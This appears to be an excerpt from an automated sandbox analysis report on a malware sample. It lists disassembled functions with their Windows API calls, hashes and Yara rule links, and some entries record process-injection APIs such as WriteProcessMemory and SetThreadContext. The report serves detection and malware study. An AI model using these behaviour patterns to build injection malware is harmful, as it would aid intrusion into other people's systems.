                                                                                    • Instruction ID: 3871531bdbd64335bcd47deddc083d409db7e424bf8d87313681fb24d84cc5e4
                                                                                    • Opcode Fuzzy Hash: 6f811e0d9de187d837198f0d2abbaefdca079cd16d70b92b7cfc8f822d038aa9
                                                                                    • Instruction Fuzzy Hash: 9751B1B1D10349DFDB14CFA9C894ADEBBB5BF48310F24812AE819AB210D775A945CF91
                                                                                    Function 079D2042 Relevance: 1.6, APIs: 1, Instructions: 118windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • PostMessageW.USER32(?,?,?,?), ref: 079D20C5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1342658836.00000000079D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_79d0000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessagePost
                                                                                    • String ID:
                                                                                    • API String ID: 410705778-0
                                                                                    • Opcode ID: 1b5888ae1e0b9cbec3352ce01f45c2eb5d0d6a3d0a785c57bd0719f76c1a66ce
                                                                                    • Instruction ID: 52463a912f45d78d63d98433770c0cd7d23eed520212dbc7d0325d24afc3f8be
                                                                                    • Opcode Fuzzy Hash: 1b5888ae1e0b9cbec3352ce01f45c2eb5d0d6a3d0a785c57bd0719f76c1a66ce
                                                                                    • Instruction Fuzzy Hash: 724101B6904386CFDB20CFA9C540ADAFBF4EF49314F04895EE58997661C330A845CFA5
                                                                                    Function 058B1CF0 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 058B1E02
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1317389286.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_58b0000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateWindow
                                                                                    • String ID:
                                                                                    • API String ID: 716092398-0
                                                                                    • Opcode ID: 579b6c8ba52e0c0695e2b3a5f5d710a1d5dd24fefdf2d5fd92a79c52f18c2f87
                                                                                    • Instruction ID: 875c767837c1a763e89ecb1929c297bf69e2060d502be0a00151e54f6d2bfea0
                                                                                    • Opcode Fuzzy Hash: 579b6c8ba52e0c0695e2b3a5f5d710a1d5dd24fefdf2d5fd92a79c52f18c2f87
                                                                                    • Instruction Fuzzy Hash: 8341A0B1D103499FDB14CF9AC894ADEBBB5BF48314F24812AE819AB210D775A945CF90
                                                                                    Function 0C04CC88 Relevance: 1.6, APIs: 1, Instructions: 102windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1362257457.000000000C040000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C040000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_c040000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID: Focus
                                                                                    • String ID:
                                                                                    • API String ID: 2734777837-0
                                                                                    • Opcode ID: a4af8296664e60d690848ef7c4f1e9dae536db99c71139b4a8c8feb95f2aa955
                                                                                    • Instruction ID: 76834f8c740fb9c210d39472804f7619361726f1d344f1e73d0769e415a7d628
                                                                                    • Opcode Fuzzy Hash: a4af8296664e60d690848ef7c4f1e9dae536db99c71139b4a8c8feb95f2aa955
                                                                                    • Instruction Fuzzy Hash: 063170B4A012268FCB149FA9C444BAFBBF4BF48710F2444A9E815AB350CB35E801CBA1
                                                                                    Function 058B0BFC Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CallWindowProcW.USER32(?,?,?,?,?), ref: 058B4381
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1317389286.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_58b0000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID: CallProcWindow
                                                                                    • String ID:
                                                                                    • API String ID: 2714655100-0
                                                                                    • Opcode ID: 0f714bab2a61b405f646c0d57e70e503142034586eaf712a4c1c63ce14010601
                                                                                    • Instruction ID: cc07eb109529f3b53dc133d3aa5cb611f069248906a25c7aecb579834b5fd815
                                                                                    • Opcode Fuzzy Hash: 0f714bab2a61b405f646c0d57e70e503142034586eaf712a4c1c63ce14010601
                                                                                    • Instruction Fuzzy Hash: B9412CB4900309DFDB14CF95C449EAABBFAFF8C314F188559E519AB321D375A845CBA0
                                                                                    Function 01B0449C Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CreateActCtxA.KERNEL32(?), ref: 01B059A9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1304129332.0000000001B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B00000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1b00000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID: Create
                                                                                    • String ID:
                                                                                    • API String ID: 2289755597-0
                                                                                    • Opcode ID: 7000e44dfeae2aeea9fb1c5df257ebc32c8e8ab7da5443b37b21d55f840b459d
                                                                                    • Instruction ID: fc835b270a0a95d8d8e6741b27348ce17293e3a0332b607f46a6e8990a3ccc01
                                                                                    • Opcode Fuzzy Hash: 7000e44dfeae2aeea9fb1c5df257ebc32c8e8ab7da5443b37b21d55f840b459d
                                                                                    • Instruction Fuzzy Hash: 8F41BF70C10719CFEB29DFA9C884B9DBBF5BF49304F20816AD408AB251DB756946CFA0
                                                                                    Function 079D7300 Relevance: 1.6, APIs: 1, Instructions: 95COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1342658836.00000000079D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_79d0000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID: ActiveWindow
                                                                                    • String ID:
                                                                                    • API String ID: 2558294473-0
                                                                                    • Opcode ID: 9e8ef41a649227adbf2c1fe0184c098f776b9a0d1a82996343e8c8c1b2678333
                                                                                    • Instruction ID: d79f1220b33edf9f8f90f0b0c778747e5b62d783b9110d5a8a7cf16653e39537
                                                                                    • Opcode Fuzzy Hash: 9e8ef41a649227adbf2c1fe0184c098f776b9a0d1a82996343e8c8c1b2678333
                                                                                    • Instruction Fuzzy Hash: CA31B0B1900305CFEB15DFA6D9497AEBFF9FB48308F14C429D419A7240C7B89845CB61
                                                                                    Function 01B058ED Relevance: 1.6, APIs: 1, Instructions: 94COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CreateActCtxA.KERNEL32(?), ref: 01B059A9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1304129332.0000000001B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B00000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1b00000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID: Create
                                                                                    • String ID:
                                                                                    • API String ID: 2289755597-0
                                                                                    • Opcode ID: 47ee2e1959c6fffcdf6b3e1d522d87a6a3d88415f62547fe2cf242b8d0903143
                                                                                    • Instruction ID: 969056404cad03efa88f2af324d870e3127442cde08a4ec3ad732c3ec34afaa5
                                                                                    • Opcode Fuzzy Hash: 47ee2e1959c6fffcdf6b3e1d522d87a6a3d88415f62547fe2cf242b8d0903143
                                                                                    • Instruction Fuzzy Hash: 1A41CF70C00719CFEB28CFA9C884BCDBBB5BF48304F24806AD418AB251DB756946CF50
                                                                                    Function 07CE3100 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1352127589.0000000007CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CE0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ce0000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateFromIconResource
                                                                                    • String ID:
                                                                                    • API String ID: 3668623891-0
                                                                                    • Opcode ID: d7640f9a3ac38f02b51397c909493a2fb86cfa6ec5d250a84fc196ae4ce2ee25
                                                                                    • Instruction ID: 25ef2a72b918a82f98fc2b74c269f3d79b06e1c73bf5a5c3a0851786d7be6c70
                                                                                    • Opcode Fuzzy Hash: d7640f9a3ac38f02b51397c909493a2fb86cfa6ec5d250a84fc196ae4ce2ee25
                                                                                    • Instruction Fuzzy Hash: 1731BFB29043899FCB11CFA9C844ADEBFF8EF49310F14805AF954AB251C335A850DFA1
                                                                                    Function 079D7B49 Relevance: 1.6, APIs: 1, Instructions: 81windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • DispatchMessageW.USER32(?,?,?,?,?,?,00000000,-00000018,?,079D6FA7), ref: 079D7B1D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1342658836.00000000079D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_79d0000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID: DispatchMessage
                                                                                    • String ID:
                                                                                    • API String ID: 2061451462-0
                                                                                    • Opcode ID: 95207d90bc94b7864f3a30d681d7131c95379552a6f17b2aaeb816bbc66790bb
                                                                                    • Instruction ID: fc5df14c2de1ae8ffd9faa965531edd9b265d2aaeec8a6707e614cb8bf74cd71
                                                                                    • Opcode Fuzzy Hash: 95207d90bc94b7864f3a30d681d7131c95379552a6f17b2aaeb816bbc66790bb
                                                                                    • Instruction Fuzzy Hash: 4F3146B5A14219CFDB14CFA9D844AEDBBF5BF88318F0484AAE415AB360C7389844CF64
                                                                                    Function 0C0450B0 Relevance: 1.6, APIs: 1, Instructions: 77COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • KiUserCallbackDispatcher.NTDLL(00000003,00000000,00000000,?,?,?,00000000), ref: 0C04512E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1362257457.000000000C040000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C040000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_c040000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID: CallbackDispatcherUser
                                                                                    • String ID:
                                                                                    • API String ID: 2492992576-0
                                                                                    • Opcode ID: 3ac76c8ad5e20d98f12186786f66b36dded7dd03cc6daeb07d51bb8ba65a1e89
                                                                                    • Instruction ID: 6a23c77a73ab1cd11fbdd37f005127d0fcf3b68b9626fd625b9ba0293951808d
                                                                                    • Opcode Fuzzy Hash: 3ac76c8ad5e20d98f12186786f66b36dded7dd03cc6daeb07d51bb8ba65a1e89
                                                                                    • Instruction Fuzzy Hash: 5121CF72B002159BEB18DB69DC10BAEB7BAEFC4714F1481B4E50997395DB74EC11CB80
                                                                                    Function 07CE790C Relevance: 1.6, APIs: 1, Instructions: 72COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,07CE8E35,?,?), ref: 07CE8EE7
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1352127589.0000000007CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CE0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ce0000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID: DrawText
                                                                                    • String ID:
                                                                                    • API String ID: 2175133113-0
                                                                                    • Opcode ID: d45d0d9e6896e8cf0786e504f196fd24204a84b93e116de3b77908ce44129192
                                                                                    • Instruction ID: 3a46494d87b1a63fbc25605b73f1e764656e84cd7d68cd9cd93e6756b84d6ba8
                                                                                    • Opcode Fuzzy Hash: d45d0d9e6896e8cf0786e504f196fd24204a84b93e116de3b77908ce44129192
                                                                                    • Instruction Fuzzy Hash: 0031E4B5D013499FDB10CF9AD880A9EFBF9FB48314F14842AE915A7310D775A940CFA4
                                                                                    Function 07CE8E48 Relevance: 1.6, APIs: 1, Instructions: 70COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,07CE8E35,?,?), ref: 07CE8EE7
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1352127589.0000000007CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CE0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ce0000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID: DrawText
                                                                                    • String ID:
                                                                                    • API String ID: 2175133113-0
                                                                                    • Opcode ID: a0574791920468f39345be2e451348c527e2b56166af32561caadeb984318e10
                                                                                    • Instruction ID: 5e32f695d5f97b294c6a71fefc9cd6a1cb5c02e91f1589651a266dc710354d45
                                                                                    • Opcode Fuzzy Hash: a0574791920468f39345be2e451348c527e2b56166af32561caadeb984318e10
                                                                                    • Instruction Fuzzy Hash: 8231E3B5D0124A9FDB11CF9AD980ADEBBF5BB48310F14842AE418A7310D375A541CFA4
                                                                                    Function 0755CD80 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 0755CE10
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1340072733.0000000007550000.00000040.00000800.00020000.00000000.sdmp, Offset: 07550000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7550000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID: MemoryProcessWrite
                                                                                    • String ID:
                                                                                    • API String ID: 3559483778-0
                                                                                    • Opcode ID: df0f255255026078914e2c2872ec9af23d4e01079562b6ce464a5679719ddb78
                                                                                    • Instruction ID: e8354c4ac823042052a562bc3606a1d5d0d636adb9c0e9796cb9d846a57e2833
                                                                                    • Opcode Fuzzy Hash: df0f255255026078914e2c2872ec9af23d4e01079562b6ce464a5679719ddb78
                                                                                    • Instruction Fuzzy Hash: C42124B2D003599FDB10CFAAC880BDEBBF5FF48310F10842AE919A7240C7799950DBA4
                                                                                    Function 0C04EF10 Relevance: 1.6, APIs: 1, Instructions: 68windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1362257457.000000000C040000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C040000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_c040000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID: Focus
                                                                                    • String ID:
                                                                                    • API String ID: 2734777837-0
                                                                                    • Opcode ID: f15b6bca38c50647a0e7918c38f4848bd191d4d845585b61a85866df92e7745f
                                                                                    • Instruction ID: a004a640fd8b5afd77d393e2c76c8b2669beb86a458404005bf26aad91b2c499
                                                                                    • Opcode Fuzzy Hash: f15b6bca38c50647a0e7918c38f4848bd191d4d845585b61a85866df92e7745f
                                                                                    • Instruction Fuzzy Hash: 14215AB5A012598FCB20DFA5D844BAEFBF4FB48714F244469E828A7740C735A841CBE1
                                                                                    Function 0C04C108 Relevance: 1.6, APIs: 1, Instructions: 67threadCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 0C04C19A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1362257457.000000000C040000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C040000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_c040000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID: CurrentThread
                                                                                    • String ID:
                                                                                    • API String ID: 2882836952-0
                                                                                    • Opcode ID: 8907c1d92adb54050f3a6dda6e4aa315db3b5a02510ec51cb50f022a0c1c5789
                                                                                    • Instruction ID: c068ee0898e032e04c14b0e53f1b2045a2dd3ba9918f5b0b95c6b4c7debbdc9e
                                                                                    • Opcode Fuzzy Hash: 8907c1d92adb54050f3a6dda6e4aa315db3b5a02510ec51cb50f022a0c1c5789
                                                                                    • Instruction Fuzzy Hash: DF2146B4900249CFDB10DFA9D884BDEBBF0FB88314F148529D419AB351D738A945CFA1
                                                                                    Function 01B0D398 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 01B0D427
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1304129332.0000000001B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B00000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1b00000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID: DuplicateHandle
                                                                                    • String ID:
                                                                                    • API String ID: 3793708945-0
                                                                                    • Opcode ID: 647b13d8ea945decbec49a4cc4f3d6a3aa86315594b659fbf8281f3295522329
                                                                                    • Instruction ID: 48d395c1483502ada44922d4aeb6830a7a5053551ce25fa31f8af3d302451c03
                                                                                    • Opcode Fuzzy Hash: 647b13d8ea945decbec49a4cc4f3d6a3aa86315594b659fbf8281f3295522329
                                                                                    • Instruction Fuzzy Hash: B921F2B5D00259AFDB11CFAAD884AEEBFF4EB48314F14805AE914A7350C378A940CFA5
                                                                                    Function 0C044828 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • MonitorFromPoint.USER32(?,?,00000002), ref: 0C0448A7
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1362257457.000000000C040000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C040000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_c040000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID: FromMonitorPoint
                                                                                    • String ID:
                                                                                    • API String ID: 1566494148-0
                                                                                    • Opcode ID: 643a827be6938b9283e2d0ea8d8345fd7bc9d058a1466c98ca49a2c422339139
                                                                                    • Instruction ID: 137d8b697aaa38ea56bc557baa8e87510b7610f3bf6232b48cea2e472f97dd37
                                                                                    • Opcode Fuzzy Hash: 643a827be6938b9283e2d0ea8d8345fd7bc9d058a1466c98ca49a2c422339139
                                                                                    • Instruction Fuzzy Hash: 4B21BAB4E012499FCB10DF99C848BAEBBF4FB48314F10801AE855BB780C775A904CFA1
                                                                                    Function 0C0431B8 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetClassInfoW.USER32(?,00000000), ref: 0C04323C
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1362257457.000000000C040000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C040000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_c040000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID: ClassInfo
                                                                                    • String ID:
                                                                                    • API String ID: 3534257612-0
                                                                                    • Opcode ID: a7137a81e21e06ead35340ec240fc6f1a717bac4b6bc93e31a24038356dd0910
                                                                                    • Instruction ID: 461ce71d0feb64a8b3bc76beea810aa1f96476353cd7a27ca56cd41977a5917a
                                                                                    • Opcode Fuzzy Hash: a7137a81e21e06ead35340ec240fc6f1a717bac4b6bc93e31a24038356dd0910
                                                                                    • Instruction Fuzzy Hash: C12125B19013499FDB10CF9AD984ADEFBF4BB48210F14842EE918A3250D378A504CB65
                                                                                    Function 0755CE70 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 0755CEF0
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1340072733.0000000007550000.00000040.00000800.00020000.00000000.sdmp, Offset: 07550000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7550000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID: MemoryProcessRead
                                                                                    • String ID:
                                                                                    • API String ID: 1726664587-0
                                                                                    • Opcode ID: 56046691c2ccfd6c0e0cbde4238910736ac2cdca3bcba0f0668e8cfb8bebb7a1
                                                                                    • Instruction ID: 93ae52e2cb34c51595f8a91b89e67d88a92aee7c14b720de487e15830a4798fb
                                                                                    • Opcode Fuzzy Hash: 56046691c2ccfd6c0e0cbde4238910736ac2cdca3bcba0f0668e8cfb8bebb7a1
                                                                                    • Instruction Fuzzy Hash: A121E5B1C003599FDB14DFAAC840ADEBBF5BF48310F10842AE959A7640C7799541DBA5
                                                                                    Function 0755CBE8 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0755CC66
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1340072733.0000000007550000.00000040.00000800.00020000.00000000.sdmp, Offset: 07550000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7550000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID: ContextThreadWow64
                                                                                    • String ID:
                                                                                    • API String ID: 983334009-0
                                                                                    • Opcode ID: 53ab06256bf86b0e6d861cdef19ad6e997a1c9ecc1a8795fcf9b7c90a0477701
                                                                                    • Instruction ID: 6ab2c48248226d2826e028477d2e11c492c0cfa8bee690077173250fdd0491fb
                                                                                    • Opcode Fuzzy Hash: 53ab06256bf86b0e6d861cdef19ad6e997a1c9ecc1a8795fcf9b7c90a0477701
                                                                                    • Instruction Fuzzy Hash: 852104B1D003099FDB14DFAAC485BEEBBF4AB48314F14842ED959A7240CB78A945CBA5
                                                                                    Function 01B0D3A0 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 01B0D427
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1304129332.0000000001B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B00000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1b00000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID: DuplicateHandle
                                                                                    • String ID:
                                                                                    • API String ID: 3793708945-0
                                                                                    • Opcode ID: 8fbed9bb087054d8e9511c03beea09ffec0dc90d31ad073085618f16fb193cc9
                                                                                    • Instruction ID: 69bd49c9514abace76533df5bc944da276a5b848e39225846485a2486c077bd3
                                                                                    • Opcode Fuzzy Hash: 8fbed9bb087054d8e9511c03beea09ffec0dc90d31ad073085618f16fb193cc9
                                                                                    • Instruction Fuzzy Hash: 1121E4B5D002489FDB10CFAAD884ADEBFF4FB48310F14801AE914A3350C379A940CF65
                                                                                    Function 0C0431C0 Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetClassInfoW.USER32(?,00000000), ref: 0C04323C
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1362257457.000000000C040000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C040000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_c040000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID: ClassInfo
                                                                                    • String ID:
                                                                                    • API String ID: 3534257612-0
                                                                                    • Opcode ID: fda887cb0dadf82dbead65d90c4bad1d9d1f6c30fd34c049c66b27ab599e2e8e
                                                                                    • Instruction ID: e4f2a086c52b9501a26d937f48e189b0a103c45ebe54faf87b59182ad4275866
                                                                                    • Opcode Fuzzy Hash: fda887cb0dadf82dbead65d90c4bad1d9d1f6c30fd34c049c66b27ab599e2e8e
                                                                                    • Instruction Fuzzy Hash: 172102B2D017599FDB14CF9AC984ADEFBF4BB48310F14802EE918A3250D378A904CB65
                                                                                    Function 0C04C201 Relevance: 1.6, APIs: 1, Instructions: 60threadCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • EnumThreadWindows.USER32(?,00000000,?), ref: 0C04C279
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1362257457.000000000C040000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C040000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_c040000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID: EnumThreadWindows
                                                                                    • String ID:
                                                                                    • API String ID: 2941952884-0
                                                                                    • Opcode ID: 49d1325656a65841bd8823d18cca8a316cf9ce748981354fc698978b3d09cb15
                                                                                    • Instruction ID: 2edf8161a8a02c899c54b0c06ecbb57193d27d21aa01384627d88b3197966ac5
                                                                                    • Opcode Fuzzy Hash: 49d1325656a65841bd8823d18cca8a316cf9ce748981354fc698978b3d09cb15
                                                                                    • Instruction Fuzzy Hash: F22115B19002499FDB14CFAAC984BEEFBF5FB88310F14842AD454A7350D778A945CFA5
                                                                                    Function 01B0B159 Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 01B0B126
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1304129332.0000000001B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B00000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1b00000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID: HandleModule
                                                                                    • String ID:
                                                                                    • API String ID: 4139908857-0
                                                                                    • Opcode ID: a5b16a8b7893b3ec9f00a7a3076b9bcf7d5fbc4a373dc4e450e64df7a95d3c3b
                                                                                    • Instruction ID: b27d63aa4dd5928971123ed9a4c79e4825f10ed6044510a0bd239576ec2c6385
                                                                                    • Opcode Fuzzy Hash: a5b16a8b7893b3ec9f00a7a3076b9bcf7d5fbc4a373dc4e450e64df7a95d3c3b
                                                                                    • Instruction Fuzzy Hash: B811C8766003058FEB19DF5AD9007AABFF9EFC4310F14849AD104A7291C774A905CBA0
                                                                                    Function 0C04C208 Relevance: 1.6, APIs: 1, Instructions: 59threadCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • EnumThreadWindows.USER32(?,00000000,?), ref: 0C04C279
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1362257457.000000000C040000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C040000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_c040000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID: EnumThreadWindows
                                                                                    • String ID:
                                                                                    • API String ID: 2941952884-0
                                                                                    • Opcode ID: 79fd0a10fe6f28a457f84c7b38102b26f743d2c5381046fd80f6c41741c35caa
                                                                                    • Instruction ID: a4cff5904533f16a93e84707d6856257c348d89c6751bc59ffbd2cbc985ebf2c
                                                                                    • Opcode Fuzzy Hash: 79fd0a10fe6f28a457f84c7b38102b26f743d2c5381046fd80f6c41741c35caa
                                                                                    • Instruction Fuzzy Hash: 3C2115B19002099FDB14CFAAC944BEEFBF4FB88310F14842AD454A3250D778A945CF65
                                                                                    Function 0C044818 Relevance: 1.6, APIs: 1, Instructions: 58COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • MonitorFromPoint.USER32(?,?,00000002), ref: 0C0448A7
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1362257457.000000000C040000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C040000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_c040000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID: FromMonitorPoint
                                                                                    • String ID:
                                                                                    • API String ID: 1566494148-0
                                                                                    • Opcode ID: 1f496341779aefd9f21b34474c78060b3d9d59ad989e194350f061a6373c87c9
                                                                                    • Instruction ID: dd2df152f42c9bc7409acc2467bef972770a794996d81ab939770906492740c0
                                                                                    • Opcode Fuzzy Hash: 1f496341779aefd9f21b34474c78060b3d9d59ad989e194350f061a6373c87c9
                                                                                    • Instruction Fuzzy Hash: 8D2159B5D002899FDB11DF99C445BEEBBF4FB48314F14802AD855BB680C3396944CFA1
                                                                                    Function 0C0441E3 Relevance: 1.6, APIs: 1, Instructions: 58COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetForegroundWindow.USER32 ref: 0C044259
                                                                                    Memory Dump Source
